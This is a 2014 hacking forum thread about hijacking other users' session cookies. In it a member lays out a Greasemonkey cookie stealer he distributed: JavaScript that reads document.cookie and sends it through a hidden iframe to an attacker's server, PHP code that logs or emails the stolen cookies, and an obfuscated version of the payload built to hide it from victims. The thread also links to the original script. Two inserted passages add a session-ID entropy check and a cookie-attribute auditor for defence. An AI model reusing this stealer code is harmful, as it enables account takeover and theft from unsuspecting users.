Finding cookies

Post by Zaytrox on Mon Jun 09, 2014 8:17 am

Is it possible to find out other people's cookies remotely? Because surely then in theory you could change your Session ID to theirs, and effectively take control of their account?
I'm extremely new to this and just messing around, but was hoping one of you more experienced folk might know a fair bit more about it.

Thanks!

Zay.
Basic: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) (11)
Realistic: (1) (2) (3) (4) (5) (6) (7)


Re: Finding cookies

Post by cyberdrain on Mon Jun 09, 2014 3:26 pm

Yes it is possible, it is called session cookie hijacking...
Free your mind / Think clearly
I use the sarcasm color for both sarcasm and irony


Re: Finding cookies

Post by -Ninjex- on Mon Jun 09, 2014 4:56 pm

You mean something like:
viewtopic.php?f=156&t=9882
.Down the Tunnel


Re: Finding cookies

Post by Zaytrox on Tue Jun 10, 2014 1:45 am

Aha, thank you - and I'll have a look at that now Ninjex, looks very interesting!

Also, surely you could brute force guess other cookies, which would mean you wouldn't be limited by things such as maximum number of attempts and needing the username, as with guessing passwords?
Although I guess you wouldn't be able to choose who to target, it'd just be the luck of the draw.


Re: Finding cookies

Post by -Ninjex- on Tue Jun 10, 2014 2:04 am

Zaytrox wrote: Aha, thank you - and I'll have a look at that now Ninjex, looks very interesting!

Also, surely you could brute force guess other cookies, which would mean you wouldn't be limited by things such as maximum number of attempts and needing the username, as with guessing passwords?
Although I guess you wouldn't be able to choose who to target, it'd just be the luck of the draw.


Yes, but if you want to go that route, get a session ID analysis tool. Burp Suite has a good tool in its arsenal for this called the Sequencer. If the generated session IDs seem completely random, and they are lengthy, then a brute force approach is hardly worth trying.

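A rough version of the check described in the post above, for testing the session IDs your own application issues. This is an added example, not part of the thread and not how Burp Sequencer works internally; the 64-bit pass mark, the function names and both sample sets are assumptions constructed for illustration.

```javascript
// Assumed pass mark for this sketch, in bits of estimated entropy.
const MIN_BITS = 64;

// Shannon entropy (bits) of the characters seen at one position.
function positionEntropy(ids, pos) {
  const counts = new Map();
  for (const id of ids) counts.set(id[pos], (counts.get(id[pos]) || 0) + 1);
  let bits = 0;
  for (const n of counts.values()) {
    const p = n / ids.length;
    bits -= p * Math.log2(p);
  }
  return bits;
}

// Sum of per-position entropies. This is an optimistic estimate: positions
// are treated as independent, so patterns across positions go unnoticed,
// and each position is capped at log2(sample size).
function estimateBits(ids) {
  const len = Math.min(...ids.map((id) => id.length));
  let total = 0;
  for (let pos = 0; pos < len; pos++) total += positionEntropy(ids, pos);
  return total;
}

function assess(ids) {
  const bits = estimateBits(ids);
  return { bits: Math.round(bits * 10) / 10, ok: bits >= MIN_BITS };
}

// Hex string from a CSPRNG (Web Crypto global, or Node's crypto module).
function randomHex(nBytes) {
  const buf = new Uint8Array(nBytes);
  (globalThis.crypto || require('crypto').webcrypto).getRandomValues(buf);
  return Array.from(buf, (b) => b.toString(16).padStart(2, '0')).join('');
}

// Constructed samples: a zero-padded counter vs. 16 random bytes as hex.
const counterIds = Array.from({ length: 200 }, (_, i) =>
  'sess' + String(1000 + i).padStart(8, '0'));
const randomIds = Array.from({ length: 200 }, () => randomHex(16));

console.log('counter:', assess(counterIds));
console.log('random: ', assess(randomIds));
```

A low score proves the IDs are weak; a high score only means this particular test found nothing, so it does not replace generating IDs from a CSPRNG in the first place.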

Re: Finding cookies

Post by Zaytrox on Tue Jun 10, 2014 2:40 am

-Ninjex- wrote:
Zaytrox wrote:...


Yes, but if you want to go that route, get a session ID analysis tool. Burp Suite has a good tool in its arsenal for this called the Sequencer. If the generated session IDs seem completely random, and they are lengthy, then a brute force approach is hardly worth trying.


Aha, I'll have a look now!
Also, do you still have your script for the Greasemonkey Cookie Stealer? As I was wondering if it would be possible for me to have a look at how you did it.


Re: Finding cookies

Post by -Ninjex- on Tue Jun 10, 2014 7:01 am

Unfortunately, my cookie stealing script was originally hosted at userscripts.org, and they have since gone down.

I can however explain the process I took in order to pull it off.

Things I needed:
1. A website with PHP hosting.
2. A way to get desired JavaScript code to run on the victim, hence Greasemonkey.
3. A way to help keep the malicious code hidden from the source code.
4. A way to help keep the malicious code hidden as it is running on the victim's end.

So, this is what needs to happen:
JavaScript needs to pull the user's cookie information, which can be done with document.cookie.
We will then have JavaScript append an iframe directed to our site, where we have a PHP script waiting to obtain the cookie information.
We will do this in the form of a $_GET parameter.
Then our site will redirect the iframe back to some other page; my choice was back to hackthissite.

So our site's path will be set up something like so:
http://www.cookiemonster.com/cookie.php?cookie=<cookie information here>

Now, if we have a mail service set up, we can just send the cookie information via mail, so that it's not on a server publicly (without access restrictions). However, the other route would be to write it to a file on the server, so that you can view it later.
Here is a snippet of PHP code to do this.

Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"]; // Grab the information with PHP
$file = fopen('cookies.txt', 'a');
fwrite($file, $cookie . "\r\n");
echo("<script>location.href='http://www.redirecttosomesite.com';</script>");
?>


If you have it set up to email, use this method instead:

Code:
<?php
$hacker_email   = 'hacker@1337.com';
$sub = 'Cookie Notification';
$cookie = $HTTP_GET_VARS["cookie"];
mail($to, $sub, $cookie);
echo("<script>location.href='http://www.redirecttosomesite.com';</script>");
?>


The JavaScript code I used was similar to this, I believe (not obfuscated):

Code:
var frame = document.createElement('iframe');
frame.setAttribute('id', 'ifrm');
document.body.appendChild(frame);
frame.setAttribute('src', 'www.cookiemonster.com/cookie.php?cookie=' + document.cookie);
document.getElementById('ifrm').height= 0 + "px";
document.getElementById('ifrm').width= 0 + "px";


The next step is obfuscating the JavaScript code, which I did poorly, and I'm not sure why. Maybe because I was naive and well, pretty fucking stupid back then.

So it ended up a little more sloppy than this:

Code:
$HY7W8yrC$O2JKqyG2x$=function(n){if(typeof($HY7W8yrC$O2JKqyG2x$.list[n])=="string")return $HY7W8yrC$O2JKqyG2x$.list[n].split("").reverse().join("");return $HY7W8yrC$O2JKqyG2x$.list[n]};$HY7W8yrC$O2JKqyG2x$.list=["=eikooc?php.eikooc/moc.retsnomeikooc.www"];var c=document.createElement('iframe');c.setAttribute('id','ifrm');document.body.appendChild(c);c.setAttribute('src',$HY7W8yrC$O2JKqyG2x$(0)+document.cookie);document.getElementById('iframe').height=0+"px";document.getElementById('iframe').width=0+"px";

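The script in the post above depends on `document.cookie` exposing the session cookie, which the browser does not do for cookies set with `HttpOnly`. The following added example (not from the thread) audits `Set-Cookie` response headers for that and related attributes; the header values and the session cookie names are constructed assumptions.

```javascript
// Parse one Set-Cookie header value into a name and a lowercase attribute map.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? '' : pair.slice(0, eq);
  const attributes = new Map();
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attributes.set(key, i === -1 ? '' : attr.slice(i + 1).trim());
  }
  return { name, attributes };
}

// List the missing protections for one cookie.
function auditCookie(header) {
  const { name, attributes } = parseSetCookie(header);
  const findings = [];
  // Without HttpOnly, script running in the page reads it via document.cookie.
  if (!attributes.has('httponly')) findings.push('missing HttpOnly');
  // Without Secure, the cookie is also sent over unencrypted HTTP.
  if (!attributes.has('secure')) findings.push('missing Secure');
  const sameSite = (attributes.get('samesite') || '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    findings.push('SameSite not Lax or Strict');
  }
  return { name, findings };
}

// Audit only the cookies that carry the session (names are assumptions).
function auditAll(headers, sessionNames) {
  const wanted = new Set(sessionNames.map((n) => n.toLowerCase()));
  return headers
    .map(auditCookie)
    .filter((r) => wanted.has(r.name.toLowerCase()));
}

// Constructed Set-Cookie values, not taken from any real site.
const sampleHeaders = [
  'PHPSESSID=constructed-value-1; path=/',
  'sid=constructed-value-2; Path=/; Secure; HttpOnly; SameSite=Lax',
  'theme=dark; Path=/; Secure; SameSite=None',
];

for (const r of auditAll(sampleHeaders, ['PHPSESSID', 'sid'])) {
  console.log(r.name, '->', r.findings.join(', ') || 'ok');
}
```

`HttpOnly` keeps the cookie value away from page script but does not stop injected script from acting inside the victim's session, so it complements rather than replaces preventing script injection.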

Re: Finding cookies

Post by Zaytrox on Tue Jun 10, 2014 7:07 am

-Ninjex- wrote:...


Thank you very much, that's perfect! I'll spend some time looking through that now, see if I can recreate something similar myself.

Again, thanks!


Re: Finding cookies

Post by mShred on Sat Jun 14, 2014 3:02 pm

@Ninjex,
http://userscripts.org:8080/ is working as of right now. Not sure how far back that DB goes but yeah.

Update: Looky here.

For those about to rock.


Re: Finding cookies

Post by -Ninjex- on Sat Jun 14, 2014 7:26 pm

mShred wrote: @Ninjex,
http://userscripts.org:8080/ is working as of right now. Not sure how far back that DB goes but yeah.

Update: Looky here.


Fuq yeah, you are awesome.
I removed some code in an "update" for security reasons of course, although I can't remove all of it.
So, here is a link to the previous version before changes:

http://userscripts.org:8080/scripts/diff/159331/626810

